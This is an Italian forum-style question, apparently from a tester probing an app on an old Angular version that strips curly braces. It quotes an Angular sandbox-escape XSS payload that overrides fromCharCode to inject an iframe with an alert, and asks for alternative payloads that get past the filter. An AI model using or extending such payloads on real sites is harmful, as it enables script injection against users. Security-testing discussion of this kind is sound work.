Verifica l'app con Angular precedente. Alcune parentesi graffe vengono rimosse quando inserite nel campo o come parametro.
Trovato questo elenco di payload:
Soprattutto questo sembra interessante, dal momento che non ha parentesi graffe:
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
Tuttavia, quando lo inserisco in un campo, parametro non ottengo XSS.
Viene reinterpretato come:
'a'.constructor.fromCharCode=[].join; 'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
È valido il payload sopra?
Quali payload dovrei provare? Tieni presente che le parentesi graffe vengono in qualche modo rimosse dal lato server.
Grazie,